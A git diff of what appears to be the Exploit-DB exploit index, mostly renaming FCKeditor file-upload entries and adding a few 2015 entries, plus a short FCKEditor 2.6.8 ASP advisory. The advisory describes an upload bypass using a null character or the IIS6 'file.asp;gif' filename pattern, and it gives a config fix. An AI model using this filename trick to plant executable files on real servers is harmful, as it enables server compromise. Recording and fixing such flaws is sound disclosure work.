11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0
@ -11192,9 +11192,9 @@ id,file,description,date,author,platform,type,port
12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0
12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager - test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
@ -11304,7 +11304,7 @@ id,file,description,date,author,platform,type,port
12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0
12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0
12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
@ -11458,7 +11458,7 @@ id,file,description,date,author,platform,type,port
12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0
12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0
12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0
12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0
12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0
@ -11485,7 +11485,7 @@ id,file,description,date,author,platform,type,port
12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
@ -11584,7 +11584,7 @@ id,file,description,date,author,platform,type,port
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
@ -11592,7 +11592,7 @@ id,file,description,date,author,platform,type,port
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
@ -12191,7 +12191,7 @@ id,file,description,date,author,platform,type,port
13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0
13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0
13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0
13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0
13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0
13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
@ -12240,11 +12240,11 @@ id,file,description,date,author,platform,type,port
13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0
13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0
13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
13893,platforms/php/webapps/13893.txt,"Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0
13898,platforms/php/webapps/13898.pl,"DMSEasy0.9.7 (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include Vulnerability",2010-06-17,sh00t0ut,php,webapps,0
13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0
13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0
@ -12472,7 +12472,7 @@ id,file,description,date,author,platform,type,port
14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
@ -13254,7 +13254,7 @@ id,file,description,date,author,platform,type,port
15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0
15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
@ -13300,7 +13300,7 @@ id,file,description,date,author,platform,type,port
15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -13364,7 +13364,7 @@ id,file,description,date,author,platform,type,port
15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0
15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0
15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0
15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0
@ -13444,7 +13444,7 @@ id,file,description,date,author,platform,type,port
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0
15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
@ -13461,7 +13461,7 @@ id,file,description,date,author,platform,type,port
15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager - upload.php) Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0
15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0
15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0
@ -13829,7 +13829,7 @@ id,file,description,date,author,platform,type,port
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
@ -15028,7 +15028,7 @@ id,file,description,date,author,platform,type,port
17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0
17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0
17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0
17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0
@ -15324,7 +15324,7 @@ id,file,description,date,author,platform,type,port
17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0
17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
@ -20250,7 +20250,7 @@ id,file,description,date,author,platform,type,port
23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0
23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0
23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0
23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
@ -32832,7 +32832,7 @@ id,file,description,date,author,platform,type,port
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
@ -33811,7 +33811,7 @@ id,file,description,date,author,platform,type,port
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor - 'spellchecker.php') Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
@ -34037,3 +34037,7 @@ id,file,description,date,author,platform,type,port
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0



@ -1,15 +1,25 @@
- Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass
- Credit goes to: Mostafa Azizi, Soroush Dalili
- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/
- Link: http://sourceforge.net/projects/fckeditor/files/FCKeditor/
- Description:
There is no validation on the extensions when FCKEditor 2.6.8 ASP version is
dealing with the duplicate files. As a result, it is possible to bypass
the protection and upload a file with any extension.
- Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/
- Solution: Please check the provided reference or the vendor website.
- PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
Duplicate files do not have proper validation on their extensions.
As a result, it is possible to upload any file with any extension on the server by using Null Character.
Applications on IIS6 can also use "file.asp;gif" pattern.
- Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$"
